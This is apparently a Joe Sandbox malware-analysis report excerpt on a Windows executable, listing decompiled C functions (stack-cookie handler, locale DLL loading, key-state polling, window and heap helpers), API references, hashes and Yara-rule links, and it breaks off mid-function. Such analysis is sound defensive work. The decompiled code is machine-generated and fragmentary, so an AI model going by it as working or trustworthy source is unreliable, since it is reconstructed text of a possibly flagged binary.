                  0x00412a71
                  0x00412a71
                  0x00412a7d
                  0x00412a85
                  0x00000000
                  0x00412a87
                  0x00412a87
                  0x00412a8d
                  0x00412a95
                  0x00412a96
                  0x00412a9b
                  0x00412aa0
                  0x00412aa2
                  0x00412aa2
                  0x00412aa2
                  0x00412aa7
                  0x00412aad
                  0x00412ab2
                  0x00412ab3
                  0x00412ab4
                  0x00412aba
                  0x00000000
                  0x00000000
                  0x00412ac2
                  0x00412ace
                  0x00412ace
                  0x00412a85
                  0x00412a3e
                  0x00412ae0

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00412879
                  • _memset.LIBCMT ref: 004128DA
                  • GetVersionExW.KERNEL32(?,00000000,00000000,00000001,?,?,?,000000B0,A6E2BCA1), ref: 004128EF
                  • _malloc.LIBCMT ref: 00412910
                  • _memset.LIBCMT ref: 00412927
                  • _DebugHeapAllocator.LIBCPMTD ref: 004129F8
                  • _wcschr.LIBCMT ref: 00412A12
                  • CoInitializeEx.OLE32(00000000,00000002), ref: 00412A36
                  • CoCreateInstance.OLE32(0044B684,00000000,00000001,0043E3B4,?), ref: 00412A7D
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _memset$AllocatorCreateDebugException@8H_prolog3_HeapInitializeInstanceThrowVersion_malloc_wcschr
                  • String ID: X
                  • API String ID: 746323732-3081909835
                  • Opcode ID: 9444b300148033867f344db7c6f335abf573cddf9970f066f728b2d7ebf34bbc
                  • Instruction ID: 31284df8169f4f8c3e55b0b8dab4fb794a8dde506373f00cc48f88f740e41810
                  • Opcode Fuzzy Hash: 9444b300148033867f344db7c6f335abf573cddf9970f066f728b2d7ebf34bbc
                  • Instruction Fuzzy Hash: D77168B0A00B04CFCB21DF25C980ADABBE4BF08704F10469EE99AD7351D778A990CF58
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 002C48C1, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 416UNIQUE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID: P,
                  • API String ID: 2102423945-1817355563
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: 365082259a86fc2c1c821ac46da880ed1dfeb2c62f8fc9b14324d83bb56d9286
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: F002383091066AEFCB19DF28C8A5BEBBB75FF14304F14026EC55687641D732AA71CB94
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00427DFF, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E00427DFF(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x44c364; // 0xa6e2bca1
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x450360 = _t6;
				 *0x45035c = _t22;
				 *0x450358 = _t25;
				 *0x450354 = _t21;
				 *0x450350 = _t27;
				 *0x45034c = _t26;
				 *0x450378 = ss;
				 *0x45036c = cs;
				 *0x450348 = ds;
				 *0x450344 = es;
				 *0x450340 = fs;
				 *0x45033c = gs;
				asm("pushfd");
				_pop( *0x450370);
				 *0x450364 =  *_t31;
				 *0x450368 = _v0;
				 *0x450374 =  &_a4;
				 *0x4502b0 = 0x10001;
				_t11 =  *0x450368; // 0x0
				 *0x450264 = _t11;
				 *0x450258 = 0xc0000409;
				 *0x45025c = 1;
				_t12 =  *0x44c364; // 0xa6e2bca1
				_v812 = _t12;
				_t13 =  *0x44c368; // 0x591d435e
				_v808 = _t13;
				 *0x4502a8 = IsDebuggerPresent();
				_push(1);
				E0043294B(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x442138);
				if( *0x4502a8 == 0) {
					_push(1);
					E0043294B(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                  0x00427dff
                  0x00427dff
                  0x00427dff
                  0x00427dff
                  0x00427dff
                  0x00427dff
                  0x00427dff
                  0x00427e05
                  0x00427e07
                  0x00427e07
                  0x0042d4a7
                  0x0042d4ac
                  0x0042d4b2
                  0x0042d4b8
                  0x0042d4be
                  0x0042d4c4
                  0x0042d4ca
                  0x0042d4d1
                  0x0042d4d8
                  0x0042d4df
                  0x0042d4e6
                  0x0042d4ed
                  0x0042d4f4
                  0x0042d4f5
                  0x0042d4fe
                  0x0042d506
                  0x0042d50e
                  0x0042d519
                  0x0042d523
                  0x0042d528
                  0x0042d52d
                  0x0042d537
                  0x0042d541
                  0x0042d546
                  0x0042d54c
                  0x0042d551
                  0x0042d55d
                  0x0042d562
                  0x0042d564
                  0x0042d56c
                  0x0042d577
                  0x0042d584
                  0x0042d586
                  0x0042d588
                  0x0042d58d
                  0x0042d5a1

                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 0042D557
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042D56C
                  • UnhandledExceptionFilter.KERNEL32(00442138), ref: 0042D577
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0042D593
                  • TerminateProcess.KERNEL32(00000000), ref: 0042D59A
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID:
                  • API String ID: 2579439406-0
                  • Opcode ID: 1fe4b2b6ebe0236570f5590f3ea759de4ff918874ed7502708fae146e0effbd6
                  • Instruction ID: b227de8c8d5a73ef715095aa9f36552a373dccc0d329dfdcd9de58e4e5fcd20a
                  • Opcode Fuzzy Hash: 1fe4b2b6ebe0236570f5590f3ea759de4ff918874ed7502708fae146e0effbd6
                  • Instruction Fuzzy Hash: 2C21CCB89113049FDB50DF69E9896543BA4BB08B16F6051BAF84886372E7B49981CF0E
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 0041CEDC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E0041CEDC(void* __ecx, intOrPtr __edx, int _a4) {
				signed int _v8;
				short _v16;
				short _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				struct HINSTANCE__* _t13;
				intOrPtr* _t20;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr _t36;
				signed int _t37;
				void* _t39;
				intOrPtr _t40;
				signed int _t45;
				void* _t46;

				_t35 = __edx;
				_t31 = __ecx;
				_t43 = _t45;
				_t46 = _t45 - 0x230;
				_t9 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t9 ^ _t45;
				_t49 = _a4 - 0x800;
				_t39 = __ecx;
				_t28 = __edx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoW(_a4, 3,  &_v16, 4);
					if(__eflags == 0) {
						goto L10;
					} else {
						goto L4;
					}
				} else {
					E00402880(_t31, E0042ABEB( &_v16, 4, L"LOC"));
					_t46 = _t46 + 0x10;
					L4:
					_push(_t36);
					_t37 =  *(E00429429(_t49));
					 *(E00429429(_t49)) =  *_t16 & 0x00000000;
					_push( &_v16);
					_t30 = E00427E7D( &_v564, 0x112, 0x111, _t39, _t28);
					_t20 = E00429429(_t49);
					_t50 =  *_t20;
					if( *_t20 == 0) {
						 *(E00429429(__eflags)) = _t37;
					} else {
						E0040B759( *((intOrPtr*)(E00429429(_t50))));
					}
					_pop(_t36);
					if(_t30 == 0xffffffff || _t30 >= 0x112) {
						L10:
						_t13 = 0;
						__eflags = 0;
					} else {
						_t13 = LoadLibraryW( &_v564);
					}
				}
				_pop(_t40);
				_pop(_t29);
				return E00427DFF(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
			}





















                  0x0041cedc
                  0x0041cedc
                  0x0041cedf
                  0x0041cee1
                  0x0041cee7
                  0x0041ceee
                  0x0041cef1
                  0x0041cefa
                  0x0041cefc
                  0x0041cf01
                  0x0041cf29
                  0x0041cf2b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041cf03
                  0x0041cf11
                  0x0041cf16
                  0x0041cf2d
                  0x0041cf2d
                  0x0041cf33
                  0x0041cf3a
                  0x0041cf40
                  0x0041cf5d
                  0x0041cf5f
                  0x0041cf64
                  0x0041cf67
                  0x0041cf7d
                  0x0041cf69
                  0x0041cf70
                  0x0041cf75
                  0x0041cf7f
                  0x0041cf83
                  0x0041cf98
                  0x0041cf98
                  0x0041cf98
                  0x0041cf89
                  0x0041cf90
                  0x0041cf90
                  0x0041cf83
                  0x0041cf9d
                  0x0041cfa0
                  0x0041cfa7

                  APIs
                  • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 0041CF23
                  • __snwprintf_s.LIBCMT ref: 0041CF55
                  • LoadLibraryW.KERNEL32(?), ref: 0041CF90
                    • Part of subcall function 00429429: __getptd_noexit.LIBCMT ref: 00429429
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                  • String ID: LOC
                  • API String ID: 3175857669-519433814
                  • Opcode ID: cdc62dc400be80a96002030bcc14b6db234fd3926a899c5b58919daa1989b209
                  • Instruction ID: 8ccad98ea5934d9d1ea24b306fd994588cc14a24d9f2b1c7dca44d87f0ce5f58
                  • Opcode Fuzzy Hash: cdc62dc400be80a96002030bcc14b6db234fd3926a899c5b58919daa1989b209
                  • Instruction Fuzzy Hash: 2611E471A44218AFDB14BB65EC86BEE33A9AB01318F5004ABF101A71D1DA7C9E46C66D
                  Uniqueness

                  Uniqueness Score: 1.44%

                  Function 00403930, Relevance: 6.1, APIs: 4, Instructions: 88keyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403930(void* __ebx, intOrPtr __ecx, void* __edi, void* __fp0) {
				signed int _v8;
				intOrPtr _v12;
				void* __esi;
				signed short _t38;
				signed int _t39;
				signed short _t42;
				intOrPtr _t44;
				signed int _t57;
				signed int _t58;
				void* _t61;
				intOrPtr _t68;
				signed int _t70;
				void* _t89;
				void* _t94;

				_t94 = __fp0;
				_t89 = __edi;
				_t61 = __ebx;
				_v12 = __ecx;
				_v8 = 0;
				if( *((intOrPtr*)(_v12 + 0x58)) != 0) {
					_t38 = GetAsyncKeyState(0x10);
					__eflags = _t38 & 0x00008000;
					if((_t38 & 0x00008000) != 0) {
						_t57 = E00403A70();
						_t58 = E00403A70();
						_t90 = _t57 << 0x0000000f | _t58;
						__eflags = _t57 << 0x0000000f | _t58;
						E00409D50( *((intOrPtr*)(_v12 + 0x58)), _t57 << 0x0000000f | _t58, _t57 << 0x0000000f | _t58);
						_v8 = 1;
					}
					_t39 = GetAsyncKeyState(0x2e);
					__eflags = _t39 & 0x00008000;
					if((_t39 & 0x00008000) != 0) {
						E00409730( *((intOrPtr*)(_v12 + 0x58)), _t89);
						_v8 = 1;
					}
					_t42 = GetAsyncKeyState(0x20);
					__eflags = _t42 & 0x00008000;
					if((_t42 & 0x00008000) != 0) {
						E00409870( *((intOrPtr*)(_v12 + 0x58)));
						_v8 = 1;
					}
					__eflags = GetAsyncKeyState(0x26) & 0x00008000;
					if(__eflags != 0) {
						E004098F0(_t61,  *((intOrPtr*)(_v12 + 0x58)), _t89, _t90, __eflags);
						_v8 = 1;
					}
					_t44 = _v12;
					__eflags =  *(_t44 + 0xa1) & 0x000000ff;
					if(( *(_t44 + 0xa1) & 0x000000ff) == 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x58)))) + 4))))();
						_v8 = 1;
					}
					_t68 = _v12;
					__eflags =  *(_t68 + 0xa2) & 0x000000ff;
					if(( *(_t68 + 0xa2) & 0x000000ff) == 0) {
						__eflags = _v12 + 0x5c;
						E0040A300(_v12 + 0x5c, _t94);
						_v8 = 1;
					}
					__eflags = _v8;
					if(_v8 != 0) {
						_t70 =  *(_v12 + 0x90) + 1;
						__eflags = _t70;
						 *(_v12 + 0x90) = _t70;
						E00409E10( *((intOrPtr*)(_v12 + 0x58)));
					}
					return _v8;
				}
				return 0;
			}

















                  0x00403930
                  0x00403930
                  0x00403930
                  0x00403937
                  0x0040393a
                  0x00403948
                  0x00403953
                  0x0040395c
                  0x00403962
                  0x00403964
                  0x0040396e
                  0x00403973
                  0x00403973
                  0x0040397c
                  0x00403981
                  0x00403981
                  0x0040398a
                  0x00403991
                  0x00403996
                  0x0040399e
                  0x004039a3
                  0x004039a3
                  0x004039ac
                  0x004039b5
                  0x004039bb
                  0x004039c3
                  0x004039c8
                  0x004039c8
                  0x004039da
                  0x004039e0
                  0x004039e8
                  0x004039ed
                  0x004039ed
                  0x004039f4
                  0x004039fe
                  0x00403a00
                  0x00403a13
                  0x00403a15
                  0x00403a15
                  0x00403a1c
                  0x00403a26
                  0x00403a28
                  0x00403a2d
                  0x00403a30
                  0x00403a35
                  0x00403a35
                  0x00403a3c
                  0x00403a40
                  0x00403a4b
                  0x00403a4b
                  0x00403a51
                  0x00403a5d
                  0x00403a5d
                  0x00000000
                  0x00403a62
                  0x00000000

                  APIs
                  • GetAsyncKeyState.USER32(00000010), ref: 00403953
                  • GetAsyncKeyState.USER32(0000002E), ref: 0040398A
                  • GetAsyncKeyState.USER32(00000020), ref: 004039AC
                  • GetAsyncKeyState.USER32(00000026), ref: 004039D1
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AsyncState
                  • String ID:
                  • API String ID: 425341421-0
                  • Opcode ID: cd0a42836fb6b8300c0c44a61b74ebc25a449360982cd90194564737bc53e4f1
                  • Instruction ID: 2b6379050826c6e2d676392374a914b31daace37a3fa1792e8a536dcd3cda345
                  • Opcode Fuzzy Hash: cd0a42836fb6b8300c0c44a61b74ebc25a449360982cd90194564737bc53e4f1
                  • Instruction Fuzzy Hash: 3C315D34A00244EFDB08DF94C495BAEBBB2BF44315F1480B9E881AB3D2C7789E81DB44
                  Uniqueness

                  Uniqueness Score: 0.88%

                  Function 0040B948, Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E0040B948(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E0040B7ED() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E0040B8F7( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x44f5b4(_a4, _a8);
			}





                  0x0040b957
                  0x0040b96b
                  0x0040b97f
                  0x0040b997
                  0x0040b981
                  0x0040b988
                  0x0040b988
                  0x0040b99f
                  0x00000000
                  0x0040b9a1
                  0x00000000
                  0x0040b9a8
                  0x0040b99f
                  0x00000000
                  0x0040b96d
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 11ad636394cc0481aa147fde5a09036281f82f52467757235a65d3a07bd6b649
                  • Instruction ID: 416de8af014d9be1ea4dbf7fbfe9b48218b2e2184610911ab45494576db30b44
                  • Opcode Fuzzy Hash: 11ad636394cc0481aa147fde5a09036281f82f52467757235a65d3a07bd6b649
                  • Instruction Fuzzy Hash: DCF01D71104109AACF119F62CD089AE3A69EF00344F048032FA56B51A1DB38CA15EB9E
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00417380, Relevance: 3.0, APIs: 2, Instructions: 37windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00417380(void* __ecx, intOrPtr _a4) {
				void* _t4;
				intOrPtr _t13;
				void* _t15;

				_t13 = _a4;
				_t15 = __ecx;
				if(_t13 == 0xffffffff) {
					if(IsWindowVisible( *(__ecx + 0x20)) != 0) {
						if(IsIconic( *(_t15 + 0x20)) != 0) {
							_t13 = 9;
						}
					} else {
						_t13 = 1;
					}
				}
				_t4 = E0041598D(_t15, _t13);
				if(_t13 == 0xffffffff) {
					return _t4;
				}
				E00411E2C(_t15, _t13);
				return E0041598D(_t15, _t13);
			}






                  0x00417387
                  0x0041738a
                  0x0041738f
                  0x0041739c
                  0x004173ae
                  0x004173b2
                  0x004173b2
                  0x0041739e
                  0x004173a0
                  0x004173a0
                  0x0041739c
                  0x004173b6
                  0x004173be
                  0x004173d3
                  0x004173d3
                  0x004173c3
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: IconicVisibleWindow
                  • String ID:
                  • API String ID: 1797901696-0
                  • Opcode ID: 988aec90b0cca7727ac606b941661c2c00dd2e611c9cb3af0cc4af7175605827
                  • Instruction ID: a7006baeb99b5d17a065a62b12e578f95bb816a227c233f3111b5b7526eb579a
                  • Opcode Fuzzy Hash: 988aec90b0cca7727ac606b941661c2c00dd2e611c9cb3af0cc4af7175605827
                  • Instruction Fuzzy Hash: 61F0E932354514678520163BEC0499FF67AEBD1B70700032BFCB5832F0EAA88892D4AD
                  Uniqueness

                  Uniqueness Score: 0.42%

                  Function 0040B793, Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040B793(intOrPtr __ebx, intOrPtr __esi, void* __eflags) {
				signed int _v8;
				struct _OSVERSIONINFOA _v156;
				signed int _t9;
				intOrPtr _t21;
				intOrPtr _t22;
				char _t24;
				signed int _t27;

				_t25 = _t27;
				_t9 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t9 ^ _t27;
				E004281D0(_t22,  &(_v156.dwMajorVersion), 0, 0x90);
				_v156.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v156);
				return E00427DFF(0 | _v156.dwPlatformId == 0x00000002, __ebx, _v8 ^ _t25, _t21, _t22, __esi, _t24);
			}










                  0x0040b796
                  0x0040b79e
                  0x0040b7a5
                  0x0040b7b6
                  0x0040b7c5
                  0x0040b7cf
                  0x0040b7ec

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Version_memset
                  • String ID:
                  • API String ID: 963298953-0
                  • Opcode ID: 420f08954292e23a38c9d747a6ee8d2bee6c913634e2ac81e1c34216473a3aa8
                  • Instruction ID: 2252e46e376e273790a687ca39325a932d4c6665e5fc8660228a25cba86eb5e5
                  • Opcode Fuzzy Hash: 420f08954292e23a38c9d747a6ee8d2bee6c913634e2ac81e1c34216473a3aa8
                  • Instruction Fuzzy Hash: 9DF06575A102189FDB60DB70DD46B9E77B8AB05304F9040A9990DD2282DE749A49CB45
                  Uniqueness

                  Uniqueness Score: 2.84%

                  Function 004016A0, Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004016A0(void* __ecx) {
				void* _v8;
				void* _v12;
				void* _t17;

				_v12 = __ecx;
				_t17 = _v12;
				 *_t17 = 0x43ab14;
				if( *((intOrPtr*)(_v12 + 8)) != 0) {
					_t17 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)))) + 8))))( *((intOrPtr*)(_v12 + 8)));
				}
				if( *(_v12 + 0xc) != 0) {
					_t17 = GetProcessHeap();
					_v8 = _t17;
					if(_v8 != 0) {
						return HeapFree(_v8, 0,  *(_v12 + 0xc));
					}
				}
				return _t17;
			}






                  0x004016a6
                  0x004016a9
                  0x004016ac
                  0x004016b9
                  0x004016cd
                  0x004016cd
                  0x004016d6
                  0x004016d8
                  0x004016de
                  0x004016e5
                  0x00000000
                  0x004016f4
                  0x004016e5
                  0x004016fd

                  APIs
                  • GetProcessHeap.KERNEL32(?,00401405,?,00000000,00000000,00000000,?,?,?,000000B0,A6E2BCA1), ref: 004016D8
                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004016F4
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Heap$FreeProcess
                  • String ID:
                  • API String ID: 3859560861-0
                  • Opcode ID: 71d61eb308d1951383eabd381a20f65ce984919a870f1665cb49abb8beb88e83
                  • Instruction ID: 25a4d7d81e8201bb1a74ca22a4280da927f764245526193af182e23a0e438961
                  • Opcode Fuzzy Hash: 71d61eb308d1951383eabd381a20f65ce984919a870f1665cb49abb8beb88e83
                  • Instruction Fuzzy Hash: 2901FB34A00208EFC704DF94D888A5EFBB2EB48314F1481E9D8496B3A0C735AD91CF54
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 0041032F, Relevance: 2.0, APIs: 1, Instructions: 452COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E0041032F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t156;
				signed int _t158;
				signed int* _t161;
				intOrPtr _t168;
				intOrPtr* _t169;
				signed int _t172;
				signed int _t175;
				signed int* _t179;
				signed int* _t182;
				signed int _t186;
				signed int _t190;
				signed int _t194;
				signed int _t198;
				signed int* _t203;
				signed int _t204;
				signed int _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed int _t222;
				signed int _t226;
				unsigned int _t233;
				void* _t234;

				_t209 = __ecx;
				_push(0x70);
				E0042922B(E00438A45, __ebx, __edi, __esi);
				_t231 = __ecx;
				 *((intOrPtr*)(_t234 - 0x10)) = 0;
				 *((intOrPtr*)(_t234 - 0x14)) = 0x7fffffff;
				_t198 =  *(_t234 + 8);
				 *(_t234 - 4) = 0;
				if(_t198 != 0x111) {
					__eflags = _t198 - 0x4e;
					if(_t198 != 0x4e) {
						_t233 =  *(_t234 + 0x10);
						__eflags = _t198 - 6;
						if(_t198 == 6) {
							E0040FD1B(_t209, _t231,  *((intOrPtr*)(_t234 + 0xc)), E0040E20E(_t198, __ecx, _t233));
						}
						__eflags = _t198 - 0x20;
						if(_t198 != 0x20) {
							L12:
							_t156 =  *(_t231 + 0x4c);
							__eflags = _t156;
							if(_t156 == 0) {
								L20:
								_t158 =  *((intOrPtr*)( *_t231 + 0x28))();
								 *(_t234 + 0x10) = _t158;
								E0040CCF3(_t234 - 0x14, _t233, 7);
								_t203 = 0x44ddb0 + ((_t158 ^  *(_t234 + 8)) & 0x000001ff) * 0xc;
								 *(_t234 - 0x18) = _t203;
								__eflags =  *(_t234 + 8) -  *_t203;
								if( *(_t234 + 8) !=  *_t203) {
									L25:
									_t161 =  *(_t234 - 0x18);
									_t204 =  *(_t234 + 0x10);
									 *_t161 =  *(_t234 + 8);
									_t161[2] = _t204;
									while(1) {
										__eflags =  *_t204;
										if( *_t204 == 0) {
											break;
										}
										__eflags =  *(_t234 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t234 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t234 + 0x10) + 4)));
											while(1) {
												_t205 = E0040C280();
												__eflags = _t205;
												if(_t205 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) -  *(_t234 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t205 + 0x10)))) ==  *(_t234 + 8)) {
													( *(_t234 - 0x18))[1] = _t205;
													E0040CD27(_t234 - 0x14);
													L113:
													_t206 =  *((intOrPtr*)(_t205 + 0x14));
													L114:
													_push(_t233);
													L115:
													_push( *((intOrPtr*)(_t234 + 0xc)));
													L116:
													_t168 =  *_t206();
													L117:
													 *((intOrPtr*)(_t234 - 0x10)) = _t168;
													goto L118;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t207 = _t205 + 0x18;
												__eflags = _t207;
												_push(_t207);
											}
											_t204 =  *(_t234 + 0x10);
											L36:
											_t204 =  *_t204();
											 *(_t234 + 0x10) = _t204;
											continue;
										}
										_push( *(_t234 + 8));
										_push( *((intOrPtr*)(_t204 + 4)));
										_t175 = E0040C280();
										 *(_t234 + 0x10) = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L36;
										}
